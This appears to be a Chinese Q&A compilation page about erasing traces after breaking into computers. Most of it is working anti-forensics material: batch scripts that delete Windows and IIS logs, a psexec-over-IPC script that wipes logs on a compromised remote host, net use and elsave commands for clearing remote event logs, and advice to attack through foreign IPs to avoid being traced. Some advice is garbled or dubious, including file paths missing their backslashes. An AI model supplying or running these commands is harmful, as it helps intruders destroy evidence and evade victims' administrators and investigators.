黑客在入侵后往往要隐藏登录痕迹_黑客入侵痕迹清除

目录：

• 1、用黑客手段.入侵咯游戏服务器.怎么样才能把当时在服务器上的痕迹去掉.入侵玩马上就能去的那种
• 2、如何清除电脑“黑客”？
• 3、如果一个黑客入侵了你的电脑，但是他走的时候把入侵痕迹清楚了，难道会不会查出来他是谁了
• 4、请问黑客在入侵别人电脑后，如何清除自己留下的痕迹？
• 5、如何清除入侵日志！
• 6、黑客入侵后，会清除入侵记录，请问下谁知道清除记录的命令是什么啊？

用黑客手段.入侵咯游戏服务器.怎么样才能把当时在服务器上的痕迹去掉.入侵玩马上就能去的那种

这个要看管理员的设置，入侵日志可以清除，但是还是会有痕迹，基本要全部清除很麻烦，但是可以用国外IP进行入侵，这样对方就很难找到你

如何清除电脑“黑客”？

现在是高速信息网络时代，一些无聊的人常常利用E－mail方式将一些黑客软件放到你的计算机上，以控制你的计算机，如BO软件就是一个非常有名的黑客软件。要查看你的计算机是否有黑客的入侵，从注册表中或许可以查看到，具体操作如下：

按“开始”、“运行”，在“打开”文本框中输入“Regedit”，启动注册表编辑器进入HKEY－LOCAL－MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼RunServices分支，检查右边窗口的“＠默认”键值，如果是“〈空格〉．exe”，看来这台计算机可能已经被黑客入侵。请删除该“＠默认”的“．exe”键值。

最后，重新启动计算机。

如果一个黑客入侵了你的电脑，但是他走的时候把入侵痕迹清楚了，难道会不会查出来他是谁了

痕迹不可能这么容易清楚，比如你把手机里的一段视频删除了，警方还是可以恢复的

请问黑客在入侵别人电脑后，如何清除自己留下的痕迹？

按ctrl+alt+delete可以看到黑客软件；用款软件“柳叶擦眼”可以清除黑客软件。

如何清除入侵日志！

一、日志文件的位置

Windows 2000的系统日志文件有应用程序日志，安全日志、系统日志、DNS服务器日志等等，应用程序日志、安全日志、系统日志、DNS日志默认位置：%systemroot%system32config。

安全日志文件：%systemroot%system32configSecEvent.EVT

系统日志文件：%systemroot%system32configSysEvent.EVT

应用程序日志文件：%systemroot%system32configAppEvent.EVT

有的管理员很可能将这些日志重定位（所以日志可能不在上面那些位置），其中EVENTLOG下面有很多的子表，在里面可查到以上日志的定位目录。

二、清除自己电脑中的日志

如果你要清除自己电脑中的日志，可以用管理员的身份来登录Windows，然后在“控制面板”中进入“管理工具”，再双击里面的“事件查看器”。打开后我们就可以在这里清除日志文件了，里面有应用程序、安全和系统日志文件。举个例子，比方说你想清除安全日志，可以右键点击“安全日志”，在弹出的菜单中选择“属性”。接下来在弹出的对话框中，点击下面“清除日志”按钮就可以清除了，如果你想以后再来清除这些日志的话，可以将“按需要改写尺寸”，这样就可以在达到最大日志尺寸时进行改写事件了，不会提示你清除日志。

三、清除远程主机上的日志

大多数情况下，IIS的日志会忠实地记录它接收到的任何请求（也有特殊的不被IIS记录的攻击），一个优秀的系统管理员会利用这点来发现入侵的企图，保护自己的系统。所以如果你是黑客，入侵系统成功后第一件事便是清除日志，擦去自己的形迹，这时可以用以下两个办法：一是自己编写批处理文件来解决，编写一个能清除日志的批处理非常简单，方法是：新建一个具有如下内容的批处理文件：

@del c:winntsystem32logfiles*.*

@del c:winntsystem32config*.evt

@del c:winntsystem32dtclog*.*

@del c:winntsystem32*.log

@del c:winntsystem32*.txt

@del c:winnt*.txt

@del c:winnt*.log

@del c:del.bat

把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显命令，在它的前面加上“@”前缀字符，表示执行时本行在命令行或DOS里面不显示，另外del命令大家一定清楚吧？它是删除文件命令。

接下来再新建一个批处理文件，内容如下：

@copy del.bat ＼%1c$

@echo 向肉鸡复制本机的del.bat……OK

@psexec ＼%1 c:del.bat

@echo 在肉鸡上运行del.bat，清除日志文件……OK

保存为clean.bat即可，假设已经与肉鸡进行了Ipc连接，然后在CMD下输入：clean.bat 肉鸡IP，即可清除肉鸡上的日志文件。

清除日志的另外一个方法是借助第三方软件，如著名黑客软件流光的开发者黑客小榕的elsave.exe，就是是一款可以远程清除系统日志、应用程序日志、安全日志的软件，大家可以在网上下载到。elsave.exe使用起来很简单，首先利用获得的管理员账号与对方建立IPC会话：net use ＼ip pass /user: user，然后在命令行下执行如下命令：elsave -s ＼ip -l application -C，这样就删除了安全日志。

黑客入侵后，会清除入侵记录，请问下谁知道清除记录的命令是什么啊？

清除记录的命令：

del C:\winnt\system32\logfiles\*.*

del C:\winnt\system32\config\*.evt

del C:\winnt\system32\dtclog\*.*

del C:\winnt\system32\*.log

del C:\winnt\system32\*.txt

del C:\winnt\*.txt

del C:\winnt\*.log

标签：黑客入侵痕迹清除